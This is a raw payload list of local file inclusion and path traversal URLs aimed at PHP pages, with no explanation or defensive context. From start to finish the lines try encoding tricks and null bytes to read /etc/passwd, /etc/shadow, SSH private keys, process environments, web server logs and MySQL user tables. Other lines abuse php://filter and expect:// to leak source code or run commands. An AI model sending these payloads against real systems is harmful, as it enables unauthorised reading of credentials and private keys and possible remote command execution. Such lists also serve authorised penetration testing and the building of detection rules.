/index.php?page=%252e%252e%252fetc%252fpasswd%00
/index.php?page=%252e%252e%252fetc%252fpasswd
/index.php?page=php://filter/read=string.rot13/resource=index.php
/index.php?page=php://filter/convert.base64-encode/resource=index.php
/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
/index.php?page=php://filter/read=string.rot13/resource=etc/passwd
/index.php?page=php://filter/convert.base64-encode/resource=etc/passwd
/index.php?page=pHp://FilTer/convert.base64-encode/resource=etc/passwd
/index.php?page=../../../etc/passwd............[ADD MORE]
/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 
/index.php?page=../../../[ADD MORE]../../../../etc/passwd
/index.php?page=....//....//etc/passwd
/index.php?page=..///////..////..//////etc/passwd
/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
/index.php?page=/../../../../../etc/passwd%00
/view.php?page=/../../../../../etc/passwd%00
/index.php?page=../../../../../etc/passwd
/view.php?page=../../../../../etc/passwd
/index.php?page=../../../../../etc/shadow
/view.php?page=../../../../../etc/shadow
/index.php?page=../../../../../etc/issue
/view.php?page=../../../../../etc/issue
/index.php?page=../../../../../etc/group
/view.php?page=../../../../../etc/group
/index.php?page=../../../../../etc/hostname
/view.php?page=../../../../../etc/hostname
/index.php?page=../../../../../etc/ssh/ssh_config
/view.php?page=../../../../../etc/ssh/ssh_config
/index.php?page=../../../../../etc/ssh/sshd_config
/view.php?page=../../../../../etc/ssh/sshd_config
/index.php?page=../../../../../etc/apache2/apache2.conf
/view.php?page=../../../../../etc/apache2/apache2.conf
/index.php?page=../../../../../usr/local/etc/apache2/httpd
/view.php?page=../../../../../usr/local/etc/apache2/httpd.conf
/index.php?page=../../../../../etc/httpd/conf/httpd.conf
/view.php?page=../../../../../etc/httpd/conf/httpd.conf
/index.php?page=../../../../../proc/self/cmdline
/view.php?page=../../../../../proc/self/cmdline
/index.php?page=../../../../../proc/self/stat
/view.php?page=../../../../../proc/self/stat
/index.php?page=../../../../../proc/self/status
/view.php?page=../../../../../proc/self/status
/index.php?page=../../../../../proc/self/fd/0
/view.php?page=../../../../../proc/self/fd/0
/index.php?page=../../../../../proc/self/fd/1
/view.php?page=../../../../../proc/self/fd/1
/index.php?page=../../../../../proc/self/fd/2
/view.php?page=../../../../../proc/self/fd/2
/index.php?page=../../../../../proc/self/fd/3
/view.php?page=../../../../../proc/self/fd/3
/index.php?page=../../../../../proc/self/fd/4
/view.php?page=../../../../../proc/self/fd/4
/index.php?page=../../../../../proc/self/fd/5
/view.php?page=../../../../../proc/self/fd/5
/index.php?page=../../../../../proc/self/fd/6
/view.php?page=../../../../../proc/self/fd/6
/index.php?page=../../../../../proc/self/fd/7
/view.php?page=../../../../../proc/self/fd/7
/index.php?page=../../../../../proc/self/fd/8
/view.php?page=../../../../../proc/self/fd/8
/index.php?page=../../../../../proc/self/fd/9
/view.php?page=../../../../../proc/self/fd/9
/index.php?page=../../../../../proc/self/fd/10
/view.php?page=../../../../../proc/self/fd/10
/index.php?page=../../../../../proc/self/fd/11
/view.php?page=../../../../../proc/self/fd/11
/index.php?page=../../../../../proc/self/fd/12
/view.php?page=../../../../../proc/self/fd/12
/index.php?page=../../../../../proc/self/fd/13
/view.php?page=../../../../../proc/self/fd/13
/index.php?page=../../../../../proc/self/fd/14
/view.php?page=../../../../../proc/self/fd/14
/index.php?page=../../../../../proc/self/fd/15
/view.php?page=../../../../../proc/self/fd/15
/index.php?page=../../../../../proc/self/fd/16
/view.php?page=../../../../../proc/self/fd/16
/index.php?page=../../../../../proc/self/fd/17
/view.php?page=../../../../../proc/self/fd/17
/index.php?page=../../../../../proc/self/fd/18
/view.php?page=../../../../../proc/self/fd/18
/index.php?page=../../../../../proc/self/fd/19
/view.php?page=../../../../../proc/self/fd/19
/index.php?page=../../../../../proc/self/fd/20
/view.php?page=../../../../../proc/self/fd/20
/index.php?page=../../../../../proc/self/fd/21
/view.php?page=../../../../../proc/self/fd/21
/index.php?page=../../../../../proc/self/fd/22
/view.php?page=../../../../../proc/self/fd/22
/index.php?page=../../../../../proc/self/fd/23
/view.php?page=../../../../../proc/self/fd/23
/index.php?page=../../../../../proc/self/fd/24
/view.php?page=../../../../../proc/self/fd/24
/index.php?page=../../../../../proc/self/fd/25
/view.php?page=../../../../../proc/self/fd/25
/index.php?page=../../../../../proc/self/fd/26
/view.php?page=../../../../../proc/self/fd/26
/index.php?page=../../../../../proc/self/fd/27
/view.php?page=../../../../../proc/self/fd/27
/index.php?page=../../../../../proc/self/fd/28
/view.php?page=../../../../../proc/self/fd/28
/index.php?page=../../../../../proc/self/fd/29
/view.php?page=../../../../../proc/self/fd/29
/index.php?page=../../../../../proc/self/fd/30
/view.php?page=../../../../../proc/self/fd/30
/index.php?page=../../../../../proc/self/fd/31
/view.php?page=../../../../../proc/self/fd/31
/index.php?page=../../../../../proc/self/fd/32
/view.php?page=../../../../../proc/self/fd/32
/index.php?page=../../../../../proc/self/fd/33
/view.php?page=../../../../../proc/self/fd/33
/index.php?page=../../../../../proc/self/fd/34
/view.php?page=../../../../../proc/self/fd/34
/index.php?page=../../../../../proc/self/fd/35
/view.php?page=../../../../../proc/self/fd/35
/index.php?page=/../../../../../etc/issue
/index.php?page=/../../../../../etc/group
/index.php?page=/../../../../../etc/hostname
/index.php?page=/../../../../../etc/ssh/ssh_config
/index.php?page=/../../../../../etc/ssh/sshd_config
/index.php?page=/root/.ssh/id_rsa
/index.php?page=/root/.ssh/authorized_keys
/index.php?page=/home/user/.ssh/authorized_keys
/index.php?page=/home/user/.ssh/id_rsa
/view.php?page=/root/.ssh/id_rsa
/view.php?page=/root/.ssh/authorized_keys
/view.php?page=/home/user/.ssh/authorized_keys
/view.php?page=/home/user/.ssh/id_rsa
/index.php?page=../
/view.php?page=../
/index.php?page=../../../../../etc/passwd
/index.php?page=../../../../../proc/self/environ
/view.php?page=../../../../../etc/passwd
/index.php?page=expect://ls
/view.php?page=expect://ls
/index.php?file=expect://ls
/view.php?file=expect://ls
/index.php?page=php://ls
/view.php?page=expect://ls
/index.php?file=expect://ls
/view.php?file=expect://ls
/index.php?file=../../../../../proc/self/environ
/index.php?page=../../../../../var/log/httpd/access_log
/view.php?page=../../../../../var/log/httpd/access_log
/index.php?page=../../../../../var/log/apache2/access.log
/view.php?page=../../../../../var/log/apache2/access.log
/index.php?page=../../../../../var/log/httpd-access.log
/view.php?page=../../../../../var/log/httpd-access.log
/index.php?page=../../../../../var/log/apache/access.log
/view.php?page=../../../../../var/log/apache/access.log
/index.php?page=../../../../../var/log/apache/error.log
/view.php?page=../../../../../var/log/apache/error.log
/index.php?page=../../../../../var/log/apache2/access.log
/view.php?page=../../../../../var/log/apache2/access.log
/index.php?page=../../../../../var/log/apache/error.log
/view.php?page=../../../../../var/log/apache/error.log
/index.php?page=../../../../../var/lib/mysql/mysql/user.frm
/view.php?page=../../../../../var/lib/mysql/mysql/user.frm
/index.php?page=../../../../../var/lib/mysql/mysql/user.MYD
/view.php?page=../../../../../var/lib/mysql/mysql/user.MYD
/index.php?page=../../../../../var/lib/mysql/mysql/user.MYI
/view.php?page=../../../../../var/lib/mysql/mysql/user.MYI

